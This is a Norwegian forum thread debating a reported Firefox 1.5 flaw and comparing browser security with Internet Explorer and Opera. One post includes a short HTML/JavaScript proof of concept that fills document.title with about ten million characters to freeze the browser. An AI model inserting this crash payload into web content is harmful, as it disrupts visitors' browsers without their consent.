Gå til innhold

Sikkerhetshull i Firefox 1.5

abene

Av abene
i Diskuter dataartikler (Tek.no)

Anbefalte innlegg

Videoannonse

Videoannonse
Annonse
rvenes

rvenes

Skrevet
Skrevet

Bruk firefox, fordi det er tryggere...

 

- Spark meg i røva! den lekker som sil den også.

 

Kva med Opera greia? har dei fått fjerna den reklamen sin? Og finnes det eit akseptabelt adblock filter / tillegg til den? Nytter jo ikkje og surfe www lengre uten det.

 

Fram til det kjem blir det og holde seg til Internet explorer med programmet Maxthon.

Lenke til kommentar
Simen1

Simen1

Skrevet
Skrevet
Bruk firefox, fordi det er tryggere...

5271829[/snapback]

Jepp, FF er tryggere fordi hull blir lappet veldig raskt etter at de blir oppdaget. Som regel i løpet av et par dager. Til sammenligning tar det ofte flere uker fra hull i I.E. oppdages til hullene tettes. En historie på ca 7 sikkerhetshull i løpet av hele nettleserens levetid er også svært bra. Til sammenligning oppdages det hull i I.E. med få ukers mellomrom. Det sier noe om at I.E. er utett som hønsenetting. Firefox kan i så måte sammenlinges med et tett tregjerde med noen få kvisthull her og der.

 

Jeg tror også at de fleste som har satt seg inn i valgmulighetene mellom nettlesere har oppdaget at I.E. ligger svært dårlig an i forhold til konkurransen. Både Opera og Firefox er milevis forran både med tanke på utstyrsnivå, brukervennlighet og sikkerhet. Andre nettlesere som Konqueror, og flere andre som jeg ikke husker navnet på skal vist også være meget konkurransedyktige mot I.E. Nå skal Microsoft komme med I.E. 7.0 snart, og vi får håpe det er nok til å hente inn mye av forspranget.

Lenke til kommentar
Langbein

Langbein

Skrevet
Skrevet
Bruk firefox, fordi det er tryggere...

 

- Spark meg i røva! den lekker som sil den også.

 

Kva med Opera greia? har dei fått fjerna den reklamen sin? Og finnes det eit akseptabelt adblock filter / tillegg til den? Nytter jo ikkje og surfe www lengre uten det.

I tillegg til argumentene til Simen1 er det også mye kjappere å patche Firefox. Trenger heller ingen restart av maskinen.

 

Hvis du trenger browser-uavhengig adblocking kan du installere Privoxy.

Lenke til kommentar
Axentrix

Axentrix

Skrevet
Skrevet

Hm, mange feil på firefox i det siste. Dette er jo ikke no sikkerhetshull da :)

Kan ikke si at en browser lekker som en sil, når det ikke gjelder sikkerhet...

 

Desuten, sånn jeg skjønte, er det veldig lett å fikse en patch for firefox :)

Det er jo bare å sette en maxlengde på document-title til si feks 100 tegn.

 

Dette skal låse browseren:

<html><head><title></title>
<script type="text/javascript">
var buffer = "";
for (var i = 0; i < 10000; i++) {
 buffer += "m";
}
var buffer2 = buffer;
for (i = 0; i < 1000; i++) {
 buffer2 += buffer;
}
document.title = buffer2;
</script></head><body></body></html>

 

Som alle ser, settes document title til en lengde på 10 millioner m`er.. :p

En grense på dette, vil jo fjerne problemet.

Lenke til kommentar
dabear

dabear

Skrevet
Skrevet

Arghhh, blir så sur når dere er så ukritiske til kildene dere bruker. Dette er *ikke* et sikkerhetshull. Det eneste denne feilen kan gjøre, er å krasje browseren. Og som nevnt i artikkelen er det bare å slette history.dat. Jeg vil karakterisere dette som en feil / bug og ikke et sikkerhetshull. Skulle dette være et sikkerhetshull, vil bugen være en fare for sikkerheten. På hvilken måte er å ikke få starte firefox en fare for sikkerheten?

Lenke til kommentar
dabear

dabear

Skrevet
Skrevet (endret)
hvis du er som meg og blir morderisk hvis du ikke får startet FF for å lese HW.no forum?

5273008[/snapback]

Da åpner jeg en av følgende:

  • opera
  • epiphany
  • konqueror

Eller i værste fall dillo eller lynx. Det er uansett ikke et sikkerhetshull i programvaren.

 

btw: firefox, Firefox, Fx eller fx, ikke FF (ifølge utviklerene sjøl).

Endret av dabear
Lenke til kommentar
G

G

Skrevet
Skrevet
Bruk firefox, fordi det er tryggere...

5271829[/snapback]

Jepp, FF er tryggere fordi hull blir lappet veldig raskt etter at de blir oppdaget. Som regel i løpet av et par dager. Til sammenligning tar det ofte flere uker fra hull i I.E. oppdages til hullene tettes. En historie på ca 7 sikkerhetshull i løpet av hele nettleserens levetid er også svært bra. Til sammenligning oppdages det hull i I.E. med få ukers mellomrom. Det sier noe om at I.E. er utett som hønsenetting. Firefox kan i så måte sammenlinges med et tett tregjerde med noen få kvisthull her og der.

 

Jeg tror også at de fleste som har satt seg inn i valgmulighetene mellom nettlesere har oppdaget at I.E. ligger svært dårlig an i forhold til konkurransen. Både Opera og Firefox er milevis forran både med tanke på utstyrsnivå, brukervennlighet og sikkerhet. Andre nettlesere som Konqueror, og flere andre som jeg ikke husker navnet på skal vist også være meget konkurransedyktige mot I.E. Nå skal Microsoft komme med I.E. 7.0 snart, og vi får håpe det er nok til å hente inn mye av forspranget.

5272183[/snapback]

 

Eg tykkjer sauenetting passar betre på IE! :D

Lenke til kommentar
Fury

Fury

Skrevet
Skrevet (endret)

Jeg synest det har blitt terpet på veldig ofta før, speielt når det gjelder IE; At en buffer overflow feil kan utnyttes til å "eksekvere" ondsinnet kode på datamaskinen.

Sjeldent at det har blitt faktiske angrep ut av dette, men risikoen er der.

 

Så gjelder dette altså ikke FF?

 

Jeg bruker FF 1.5 selv, og har ingen planer om å skifte av den grunn. Men usårbar er den ikke.

Endret av Fury
Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
Gå til emneliste

  • Hvem er aktive   0 medlemmer

    • Ingen innloggede medlemmer aktive
×
×
  • Opprett ny...